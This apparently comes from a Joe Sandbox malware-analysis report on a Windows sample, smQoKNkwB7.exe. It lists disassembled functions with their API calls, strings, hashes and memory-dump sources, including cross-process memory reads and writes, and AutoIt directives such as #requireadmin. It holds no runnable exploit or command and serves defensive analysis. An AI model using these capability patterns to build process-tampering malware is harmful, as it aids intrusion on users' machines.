Opcode Fuzzy Hash: 1ccc431c8358e648659500fd782beb2ad6247d6b7f06d16659b9d60ecf9f98b9
Instruction Fuzzy Hash: BDF03C30006A88EBDB266F65FD2C7B43B65AB00332F648318F529950F0C73089A5DF60

Function 00210F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 002110F9
__freea.LIBCMT ref: 00211117

Part of subcall function 00211537: _free.LIBCMT ref: 0021154F

Strings

a/p, xrefs: 002111DE
am/pm, xrefs: 0021117A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 9da6ac45968de7260d4faf376ea15ae288621218ff0e35ec8b2b7dce68d3dcb2
Instruction ID: f291e3cfc131d70b6e0794d2129651e452930ad01a02fb27236e1a843f13b689
Opcode Fuzzy Hash: 9da6ac45968de7260d4faf376ea15ae288621218ff0e35ec8b2b7dce68d3dcb2
Instruction Fuzzy Hash: 3FD1E0319302079ACB249F68C845BFAB7F1EF25300F280199EB159B658D3759DF0CB91

Function 002661D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00200242: EnterCriticalSection.KERNEL32(002B070C,002B1884,?,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020024D
Part of subcall function 00200242: LeaveCriticalSection.KERNEL32(002B070C,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020028A

Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9

__Init_thread_footer.LIBCMT ref: 00266238

Part of subcall function 002001F8: EnterCriticalSection.KERNEL32(002B070C,?,?,001F8747,002B2514), ref: 00200202
Part of subcall function 002001F8: LeaveCriticalSection.KERNEL32(002B070C,?,001F8747,002B2514), ref: 00200235

Part of subcall function 0025359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002535E4
Part of subcall function 0025359C: LoadStringW.USER32(002B2390,?,00000FFF,?), ref: 0025360A

Strings

x#+, xrefs: 0026633A
x#+, xrefs: 00266353
x#+, xrefs: 0026636F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#+$x#+$x#+
API String ID: 1072379062-2040377914
Opcode ID: a4f75795085ef2ad0ad35af7590151d4db7d65d89cc8826939bedc2656df32c2
Instruction ID: 56a6719798b0573b952b2cedc4984b480c957990e41c303874116b4bde95119b
Opcode Fuzzy Hash: a4f75795085ef2ad0ad35af7590151d4db7d65d89cc8826939bedc2656df32c2
Instruction Fuzzy Hash: B1C1C371A1020AAFDB14DF58C895EBEB7B9FF58300F108059F9059B291DB70ED95CB90

Function 00218A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00218B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00218B7A
__dosmaperr.LIBCMT ref: 00218B81

Strings

. , xrefs: 00218A63

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .
API String ID: 2434981716-2462612998
Opcode ID: 3cbcdfa879547951ce53d8d4374cb532962f512a93257f78f940f686b97a5507
Instruction ID: 2bd50f894f6b6a6d1f1f7a1072f8e21067c6df64a47fbd2cbbb99bea6a95a0a9
Opcode Fuzzy Hash: 3cbcdfa879547951ce53d8d4374cb532962f512a93257f78f940f686b97a5507
Instruction Fuzzy Hash: 05418C70628145AFDB259F24DCC4AF97FE5DFA6308B2841A9F889C7542DE318DA38790

Function 00242716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0024B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002421D0,?,?,00000034,00000800,?,00000034), ref: 0024B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00242760

Part of subcall function 0024B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0024B3F8

Part of subcall function 0024B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0024B355
Part of subcall function 0024B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00242194,00000034,?,?,00001004,00000000,00000000), ref: 0024B365
Part of subcall function 0024B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00242194,00000034,?,?,00001004,00000000,00000000), ref: 0024B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002427CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0024281A

Strings

@, xrefs: 00242832

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 669de2ad35457127ea00cd36cec4719b3614bfe0877732db75bb50cefc687a66
Instruction ID: a1793bdbeae9acc93e6e6f597acd436d84c55ca0c4d8ef4e9155fd54f0cee09a
Opcode Fuzzy Hash: 669de2ad35457127ea00cd36cec4719b3614bfe0877732db75bb50cefc687a66
Instruction Fuzzy Hash: 72413D72900218AFDB15DFA4CD85ADEBBB8AF05300F104099FA55B7181DB70AE99CF60

Function 0021172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\smQoKNkwB7.exe,00000104), ref: 00211769
_free.LIBCMT ref: 00211834
_free.LIBCMT ref: 0021183E

Strings

C:\Users\user\Desktop\smQoKNkwB7.exe, xrefs: 00211760, 00211767, 00211796, 002117CE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\smQoKNkwB7.exe
API String ID: 2506810119-1107081342
Opcode ID: d2580b9a19d38ab288a6aca9dd9f58b1e735fc9b8e0b9a4f385ecb470cb7022a
Instruction ID: e233df059d5b0e1de7f4f826224bb1effa4705445295077304c42793c9b04c59
Opcode Fuzzy Hash: d2580b9a19d38ab288a6aca9dd9f58b1e735fc9b8e0b9a4f385ecb470cb7022a
Instruction Fuzzy Hash: F831CE71A20218EFDB21DF999885DDEBBFCEBA5310B604166F90497251D7B08EB1CB90

Function 0024C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0024C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0024C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002B1990,00B55568), ref: 0024C395

Strings

0, xrefs: 0024C2DF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 2e290b599ff9ca37905c89a5a32839313f55bf2659184798be0c5804b9f5b2db
Instruction ID: ff403d45fb17a28e307ba05eda793edf31cc5e959c1a16404a49bb18cdaa6cae
Opcode Fuzzy Hash: 2e290b599ff9ca37905c89a5a32839313f55bf2659184798be0c5804b9f5b2db
Instruction Fuzzy Hash: 9041E3312163029FD728DF29D884B1ABBE4AF85310F2086ADF9A5972D1D770E854CB62

Function 00274416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0027CC08,00000000,?,?,?,?), ref: 002744AA
GetWindowLongW.USER32 ref: 002744C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002744D7

Strings

SysTreeView32, xrefs: 0027447C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: b92fea825ed9cbb69a88383b715dfe86488a857e641d8b8ef599d8f34c5c53da
Instruction ID: ac4b2a6435104dffa5c387249a91039084f540e0a8450f1cba7c11f68277eea4
Opcode Fuzzy Hash: b92fea825ed9cbb69a88383b715dfe86488a857e641d8b8ef599d8f34c5c53da
Instruction Fuzzy Hash: 27317031220606AFDF21AE38DC45BEA77A9EB59334F608715F979921E0DB70EC609B50

Function 00246E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00246EED
VariantCopyInd.OLEAUT32(?,?), ref: 00246F08
VariantClear.OLEAUT32(?), ref: 00246F12

Strings

*j$, xrefs: 00246E8B, 00246E90, 00246EF8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j$
API String ID: 2173805711-1770683864
Opcode ID: 2fd803801ef7018bc17f418910512b7a333233f1092910a026d0b4ceb6620d18
Instruction ID: 1411e9a93834289013dad6b678399741436386989ce979a119fe115801f33131
Opcode Fuzzy Hash: 2fd803801ef7018bc17f418910512b7a333233f1092910a026d0b4ceb6620d18
Instruction Fuzzy Hash: 5B31F671628645DFCB08AF64F8989BE37B6FF46300B210498F9834B6A1C7709D25DBD2

Function 0026304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0026335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00263077,?,?), ref: 00263378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
_wcslen.LIBCMT ref: 0026309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00263106

Strings

255.255.255.255, xrefs: 00263095, 0026309A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 78b79df701035071317136e225f5bddb31de660d75cf6c14c6016d81a398cda3
Instruction ID: d7b871ee39c8182542ebbd75c2ea19f10a0b17ad53ad3b186faddda334f78c3a
Opcode Fuzzy Hash: 78b79df701035071317136e225f5bddb31de660d75cf6c14c6016d81a398cda3
Instruction Fuzzy Hash: 6B31D535614206DFCB20CF28C585EA977E0EF55318F248099E9158B392DB72DED5CB61

Function 00274653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00274705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00274713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0027471A

Strings

msctls_updown32, xrefs: 00274684

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: c03578c89cd67064adcb9f6fd6831a9a7304fa3fba9c7d8c5dfc02709e0c70a1
Instruction ID: a0ca39027813f40035e9234681d5c011742e6e786727007c11fedb4bcd099f19
Opcode Fuzzy Hash: c03578c89cd67064adcb9f6fd6831a9a7304fa3fba9c7d8c5dfc02709e0c70a1
Instruction Fuzzy Hash: 0B21A1B5610209AFDB14EF64ECD5DBB37ADEF9A394B504149FA049B251CB30EC61CB60

Function 002495AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0024961D

Strings

#OnAutoItStartRegister, xrefs: 002495F3
#requireadmin, xrefs: 002495D9
#notrayicon, xrefs: 002495B7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 41d9366a792a278f07d71583b39f329faaac4769ffc18caae3567a380594942f
Instruction ID: c04b5cb505f065d05f274196bf5a7c8a14b87a0e4f237f58939d14d52b3fe9ce
Opcode Fuzzy Hash: 41d9366a792a278f07d71583b39f329faaac4769ffc18caae3567a380594942f
Instruction Fuzzy Hash: 43218E3213461166D335BF24EC02FBB73DC9F65310F508025FA4997082EBA09DF1C291

Function 002737B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00273840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00273850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00273876

Strings

Listbox, xrefs: 0027380F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 8d7918a22de34d650365e7f87e534202d820c1181b7ce966652a407b5d17f785
Instruction ID: 77e0fe1346b97477dd458572ecf9b9dcb1d7d6dc5ff77a19ccb863e3a44a67e6
Opcode Fuzzy Hash: 8d7918a22de34d650365e7f87e534202d820c1181b7ce966652a407b5d17f785
Instruction Fuzzy Hash: 88219272620119BBEF15CF64DC85FBB776EEF89760F108114F9489B190CA71DC629BA0

Function 002549F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00254A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00254A5C
SetErrorMode.KERNEL32(00000000,?,?,0027CC08), ref: 00254AD0

Strings

%lu, xrefs: 00254A6F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: ec3555dcab3f7f5b62cee090d377db5bc5f7bb1530915b75c754f883d04b009f
Instruction ID: 57829eb656b232aba7f9af12fed21a55b3cb3717557d3f0354b8ec0a9b1a16cb
Opcode Fuzzy Hash: ec3555dcab3f7f5b62cee090d377db5bc5f7bb1530915b75c754f883d04b009f
Instruction Fuzzy Hash: 71318575A00109AFDB10DF64C985EAEB7F8EF09308F1480A9F909DB252D771EE85CB61

Function 002741EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0027424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00274264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00274271

Strings

msctls_trackbar32, xrefs: 00274226

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 6c78aa44a2ca6a4ba80376836a5ae290b8961561c147ebd36a0b15e55dee2fcb
Instruction ID: 3166cbdc27700dda946521d1cf5dcae0193e2b088ba059bc2b9850ce974dec52
Opcode Fuzzy Hash: 6c78aa44a2ca6a4ba80376836a5ae290b8961561c147ebd36a0b15e55dee2fcb
Instruction Fuzzy Hash: B311E331250249BEEF216E29CC06FAB3BACEF95B54F114514FA59E2090D771DC719B14

Function 00242F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Part of subcall function 00242DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00242DC5
Part of subcall function 00242DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00242DD6
Part of subcall function 00242DA7: GetCurrentThreadId.KERNEL32 ref: 00242DDD
Part of subcall function 00242DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00242DE4

GetFocus.USER32 ref: 00242F78

Part of subcall function 00242DEE: GetParent.USER32(00000000), ref: 00242DF9

GetClassNameW.USER32(?,?,00000100), ref: 00242FC3
EnumChildWindows.USER32(?,0024303B), ref: 00242FEB

Strings

%s%d, xrefs: 00242FFF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 5f64f3ec26c0016a74378e446dcaaaa3432c14323496ca61e94f8276420b920a
Instruction ID: eefa98216423f46a3bbe0046b6ffefc6a9edccd93ca5673d0b921ea86c14b878
Opcode Fuzzy Hash: 5f64f3ec26c0016a74378e446dcaaaa3432c14323496ca61e94f8276420b920a
Instruction Fuzzy Hash: AE11E471710205ABCF08BF719CC6EEE37AAAF94314F044079F9099B152DF7099598F60

Function 00275882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002758C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002758EE
DrawMenuBar.USER32(?), ref: 002758FD

Strings

0, xrefs: 0027588F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 76519ec56d758aa05bee2f16896081cad33a0b81f1b98f69434fc6b97b622150
Instruction ID: b30aeeb71f5aedf3c75ac2c537dab1114e32c15d6dd199f8b72b58ac9f44b13a
Opcode Fuzzy Hash: 76519ec56d758aa05bee2f16896081cad33a0b81f1b98f69434fc6b97b622150
Instruction Fuzzy Hash: 25016D31510229EFDB219F21EC48BAEBBB4FF45360F10C099E94DE6151DBB18A94DF61

Function 0023D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0023D3BF
FreeLibrary.KERNEL32 ref: 0023D3E5

Strings

X64, xrefs: 0023D2A8
GetSystemWow64DirectoryW, xrefs: 0023D3B9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
